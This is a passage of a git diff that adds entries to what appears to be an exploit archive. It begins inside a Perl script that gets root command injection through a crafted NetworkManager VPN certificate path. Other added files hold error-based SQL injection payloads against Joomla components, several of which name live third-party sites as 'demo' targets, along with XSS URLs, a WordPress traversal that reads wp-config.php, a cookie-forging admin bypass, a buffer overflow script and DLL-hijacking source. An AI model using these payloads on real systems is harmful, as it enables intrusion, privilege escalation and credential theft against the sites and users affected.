+# NM connection entries, try +# +# $ nmcli c up vpn-FOOBAR +# +# a couple of times, until you see: +# +# logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... +# +# in the journalctl logs +# +# PS: I know in advance what the SELinux developers will say... :p +# +# I say: lulz! + + + +# create a pathname that setroubleshootd will eventually +# query sh -c { rpm -qf ... with, fucking up ' escaping. So the +# embedded pathname is then evaluated as command +# +# There goes your NSA-grade SELinux security!!! + +$file = "/tmp/foo.pem';`id|logger`;echo '"; +open(O, ">", $file) or die $!; +close O; + +# add connection +system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); +open(O,"|nmcli c edit vpn-FOOBAR") or die $!; + +print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = +1.2.3.4, username = FOOBAR\n"; +print O "set vpn.secrets password=1\nsave\nquit\n"; +close(O); + + +print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n"; \ No newline at end of file diff --git a/platforms/php/webapps/36549.txt b/platforms/php/webapps/36549.txt new file mode 100755 index 000000000..128ed8e4b --- /dev/null +++ b/platforms/php/webapps/36549.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/51411/info + +The HD Video Share ('com_contushdvideoshare') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +HD Video Share 1.3 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14 +http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a \ No newline at end of file diff --git a/platforms/php/webapps/36550.txt b/platforms/php/webapps/36550.txt new file mode 100755 index 000000000..b81f76601 --- /dev/null +++ b/platforms/php/webapps/36550.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51416/info + +PHP Membership Site Manager Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +PHP Membership Site Manager Script version 2.1 and prior are vulnerable. + +http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36551.txt b/platforms/php/webapps/36551.txt new file mode 100755 index 000000000..106896593 --- /dev/null +++ b/platforms/php/webapps/36551.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51418/info + +PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36552.txt b/platforms/php/webapps/36552.txt new file mode 100755 index 000000000..283037c8d --- /dev/null +++ b/platforms/php/webapps/36552.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51422/info + +BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +BoltWire 3.4.16 is vulnerable; other versions may also be affected. + +http://www.example.com/bolt/field/index.php?p=main&help='" +http://www.example.com/bolt/field/index.php?" + + + | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] + | [+] + | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php + |-------------------------------------------------------------------------| + |*||*||*||*||*||*||*||*||*||*||*||*||* \ No newline at end of file diff --git a/platforms/php/webapps/36560.txt b/platforms/php/webapps/36560.txt new file mode 100755 index 000000000..805343b49 --- /dev/null +++ b/platforms/php/webapps/36560.txt @@ -0,0 +1,35 @@ +###################################################################### +# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability +# Google Dork: inurl:option=com_gallery_wd +# Date: 29.03.2015 +# Exploit Author: CrashBandicot (@DosPerl) +# Vendor HomePage: http://web-dorado.com/ +# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd +# Tested on: Windows +###################################################################### + +parameter 'theme_id' in GET vulnerable + +# Example : +# Parameter: theme_id (GET) +# Type: error-based +# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + +# ==================================================================================== # + +parameter 'image_id' in POST vulnerable + +# Example : +# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 +# Parameter: image_id (POST) +# Type: error-based +# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search + + +# ~ Demo ~ # $> + +http://www.cnct.tg/ +http://www.nswiop.nsw.edu.au/ +http://cnmect.licee.edu.ro/ + +#EOF \ No newline at end of file diff --git a/platforms/php/webapps/36561.txt b/platforms/php/webapps/36561.txt new file mode 100755 index 000000000..345043f59 --- /dev/null +++ b/platforms/php/webapps/36561.txt @@ -0,0 +1,13 @@ +[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability +[+]Author: TUNISIAN CYBER +[+]Date: 29/03/2015 +[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker +[+]Type:WebApp +[+]Risk:High +[+]Overview: +Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. + +[+]Proof Of Concept: + +127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL + \ No newline at end of file diff --git a/platforms/php/webapps/36563.txt b/platforms/php/webapps/36563.txt new file mode 100755 index 000000000..cdf092f06 --- /dev/null +++ b/platforms/php/webapps/36563.txt @@ -0,0 +1,28 @@ +###################################################################### +# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability +# Google Dork: inurl:option=com_gallery_wd +# Date: 29.03.2015 +# Exploit Author: CrashBandicot (@DosPerl) +# Vendor HomePage: http://web-dorado.com/ +# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd +# Tested on: Windows +###################################################################### + +parameter 'theme_id' in GET vulnerable + +# Example : +# Parameter: theme_id (GET) +# Type: error-based +# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + +# ==================================================================================== # + +parameter 'image_id' in POST vulnerable + +# Example : +# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 +# Parameter: image_id (POST) +# Type: error-based +# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search + +#EOF \ No newline at end of file diff --git a/platforms/php/webapps/36565.txt b/platforms/php/webapps/36565.txt new file mode 100755 index 000000000..b380c9db8 --- /dev/null +++ b/platforms/php/webapps/36565.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/51423/info + +ATutor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +ATutor 2.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/ATutor/themes/default/tile_search/index.tmpl.php/" +http://www.example.com/ATutor/login.php/index.php" /index.php +http://www.example.com/ATutor/search.php/index.php" /index.php +http://www.example.com/ATutor/password_reminder.php" /index.php +http://www.example.com/ATutor/login.php/jscripts/infusion/" /index.php +http://www.example.com/ATutor/login.php/mods/_standard/flowplayer/" /index.php +http://www.example.com/ATutor/browse.php/jscripts/infusion/framework/fss/" /index.php +http://www.example.com/ATutor/registration.php/themes/default/ie_styles.css" /index.php +http://www.example.com/ATutor/about.php/" /index.php +http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" /index.php diff --git a/platforms/php/webapps/36566.txt b/platforms/php/webapps/36566.txt new file mode 100755 index 000000000..a571b88fa --- /dev/null +++ b/platforms/php/webapps/36566.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/51424/info + +Beehive Forum 101 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/forum/register.php?'[xss] +http://www.example.com/forum/register.php/''[xss] +http://www.example.com/forum/logon.php?'"'[xss] +http://www.example.com/forum/logon.php/'"'[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36567.txt b/platforms/php/webapps/36567.txt new file mode 100755 index 000000000..b87f5df88 --- /dev/null +++ b/platforms/php/webapps/36567.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/51428/info + +phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. + +http://www.example.com/phpvideopro-0.9.7/help/index.php?topic='" +http://www.example.com/phpvideopro-0.9.7/login/"><" +http://www.example.com/phpvideopro-0.9.7/configure.php/"><" +http://www.example.com/phpvideopro-0.9.7/medialist.php/"><" +http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><" +http://www.example.com/phpvideopro-0.9.7/search.php/"><" +http://www.example.com/phpvideopro-0.9.7/listgen.php/"><" +http://www.example.com/phpvideopro-0.9.7/label.php/"><" \ No newline at end of file diff --git a/platforms/php/webapps/36568.txt b/platforms/php/webapps/36568.txt new file mode 100755 index 000000000..ca581032a --- /dev/null +++ b/platforms/php/webapps/36568.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51431/info + +Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Giveaway Manager 3 is vulnerable; other versions may also be affected. + +http://www.example.com/members.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36569.txt b/platforms/php/webapps/36569.txt new file mode 100755 index 000000000..f4526288f --- /dev/null +++ b/platforms/php/webapps/36569.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51434/info + +Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3745.txt b/platforms/php/webapps/3745.txt index 5ec1b3840..c935f1a7c 100755 --- a/platforms/php/webapps/3745.txt +++ b/platforms/php/webapps/3745.txt @@ -1,11 +1,11 @@ -# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities -# D.Script: http://sourceforge.net/projects/webslider/ -# Discovered by: GolD_M = [Mahmood_ali] -# Homepage: http://Www.Tryag.Com/cc -# Exploit:[Path]/index.php?path=Shell -# Exploit:[Path]/modules/pdf.php?path=Shell -# Exploit:[Path]/plugins/highlight.php?path=Shell -# Exploit:[Path]/include/modules.php?path=Shell -# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb - -# milw0rm.com [2007-04-15] +# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities +# D.Script: http://sourceforge.net/projects/webslider/ +# Discovered by: GolD_M = [Mahmood_ali] +# Homepage: http://Www.Tryag.Com/cc +# Exploit:[Path]/index.php?path=Shell +# Exploit:[Path]/modules/pdf.php?path=Shell +# Exploit:[Path]/plugins/highlight.php?path=Shell +# Exploit:[Path]/include/modules.php?path=Shell +# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb + +# milw0rm.com [2007-04-15] diff --git a/platforms/php/webapps/5629.txt b/platforms/php/webapps/5629.txt index faffb515e..f619de03c 100755 --- a/platforms/php/webapps/5629.txt +++ b/platforms/php/webapps/5629.txt @@ -1,58 +1,58 @@ ---==+================================================================================+==-- ---==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- ---==+================================================================================+==-- - - - -Discovered By: t0pP8uZz -Discovered On: 15 MAY 2008 -Script Download: http://sourceforge.net/projects/webslider/ -DORK: N/A - - - -Vendor Has Not Been Notified! - - - -DESCRIPTION: - -Web Slider 1.6 (and prior), suffers from insecure cookie handling, when a admin logs in successfully a -cookie is created so admin doesnt have to login everypage, the bad thing is the coding is poor and the script -only checks to see if the cookie exists, it doesnt contain any password or anything. - -so all we need to do is create a cookie so it makes us look like admin, the below javascript will do just that. - - - -Exploit: - -javascript:document.cookie = "admin=1; path=/"; - - - -NOTE/TIP: - -after pasting the above javascript code in your browser on a affected domain, you will be able to goto -"/admin.php" and access it as if you were a admin. - -this should come to your attention how many web-developers are very bad coders. and leave massive -easy-to-fix holes like this in there scripts. - -just remember when downloading a file of any kind to read through its source, and make sure its secure - - - -GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! - - - -peace, t0pP8uZz - - - ---==+================================================================================+==-- ---==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-05-15] +--==+================================================================================+==-- +--==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- +--==+================================================================================+==-- + + + +Discovered By: t0pP8uZz +Discovered On: 15 MAY 2008 +Script Download: http://sourceforge.net/projects/webslider/ +DORK: N/A + + + +Vendor Has Not Been Notified! + + + +DESCRIPTION: + +Web Slider 1.6 (and prior), suffers from insecure cookie handling, when a admin logs in successfully a +cookie is created so admin doesnt have to login everypage, the bad thing is the coding is poor and the script +only checks to see if the cookie exists, it doesnt contain any password or anything. + +so all we need to do is create a cookie so it makes us look like admin, the below javascript will do just that. + + + +Exploit: + +javascript:document.cookie = "admin=1; path=/"; + + + +NOTE/TIP: + +after pasting the above javascript code in your browser on a affected domain, you will be able to goto +"/admin.php" and access it as if you were a admin. + +this should come to your attention how many web-developers are very bad coders. and leave massive +easy-to-fix holes like this in there scripts. + +just remember when downloading a file of any kind to read through its source, and make sure its secure + + + +GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! + + + +peace, t0pP8uZz + + + +--==+================================================================================+==-- +--==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-05-15] diff --git a/platforms/windows/local/36533.py b/platforms/windows/local/36533.py new file mode 100755 index 000000000..e1b472b0c --- /dev/null +++ b/platforms/windows/local/36533.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: IDM v6.20 Local Buffer Overflow +#[+] Date: 27-03-2015 +#[+] Type: Local Exploits +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: https://www.internetdownloadmanager.com/ +#[+] Friendly Sites: sec4ever.com +#[+] Twitter: @TCYB3R +#[+] Poc:http://i.imgur.com/7et4xSh.png +#[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. + + +from struct import pack +file="IDMLBOF.txt" +junk="\x41"*2313 +eip = pack(' + +int tunisian() +{ +WinExec("calc", 0); +exit(0); +return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ +tunisian(); +return 0; +} \ No newline at end of file diff --git a/platforms/windows/local/36556.c b/platforms/windows/local/36556.c new file mode 100755 index 000000000..ccc615e4d --- /dev/null +++ b/platforms/windows/local/36556.c @@ -0,0 +1,29 @@ +/* +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking +#[+] Date: 29-03-2015 +#[+] Type: Local Exploits +#[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Friendly Sites: sec4ever.com +#[+] Twitter: @TCYB3R +#[+] gcc -shared -o dwmapi.dll tcyber.c +# Copy it to the software dir. then execute the software , calc.exe will launch :). +Proof of Concept (PoC): +======================= +*/ + +#include + +int tunisian() +{ +WinExec("calc", 0); +exit(0); +return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ +tunisian(); +return 0; +} \ No newline at end of file diff --git a/platforms/windows/local/36557.txt b/platforms/windows/local/36557.txt new file mode 100755 index 000000000..aa3c7b720 --- /dev/null +++ b/platforms/windows/local/36557.txt @@ -0,0 +1,20 @@ +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking +#[+] Date: 28-03-2015 +#[+] Type: Local Exploits +#[+] Vendor: https://httrack.com/page/2/fr/index.html +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Friendly Sites: sec4ever.com +#[+] Twitter: @TCYB3R +#[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that +# the 2 files are in the same dir. +#include +#define DllExport __declspec (dllexport) +DllExport void hook_startup() { exp(); } + +int exp() +{ + WinExec("calc", 0); + exit(0); + return 0; +} \ No newline at end of file diff --git a/platforms/windows/local/36558.txt b/platforms/windows/local/36558.txt new file mode 100755 index 000000000..e9cae7ee2 --- /dev/null +++ b/platforms/windows/local/36558.txt @@ -0,0 +1,20 @@ +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking +#[+] Date: 28-03-2015 +#[+] Type: Local Exploits +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Friendly Sites: sec4ever.com +#[+] Twitter: @TCYB3R +#[+] Poc:http://i.imgur.com/naHAdJF.png +#[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that +# the 2 files are in the same dir. +#include +#define DllExport __declspec (dllexport) +DllExport void hook_startup() { exp(); } + +int exp() +{ + WinExec("calc", 0); + exit(0); + return 0; +} \ No newline at end of file diff --git a/platforms/windows/remote/36542.txt b/platforms/windows/remote/36542.txt new file mode 100755 index 000000000..cc5efb725 --- /dev/null +++ b/platforms/windows/remote/36542.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51367/info + +ExpressView Browser Plug-in is prone to multiple integer overflow and remote code-execution vulnerabilities. + +Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition. + +ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. + +http://www.exploit-db.com/sploits/36542.zip \ No newline at end of file diff --git a/platforms/windows/remote/36546.txt b/platforms/windows/remote/36546.txt new file mode 100755 index 000000000..a4ecc63fd --- /dev/null +++ b/platforms/windows/remote/36546.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51393/info + +GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability. + +Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions. + +GreenBrowser 6.0.1002 and prior versions are vulnerable. + +http://www.exploit-db.com/sploits/36546.rar \ No newline at end of file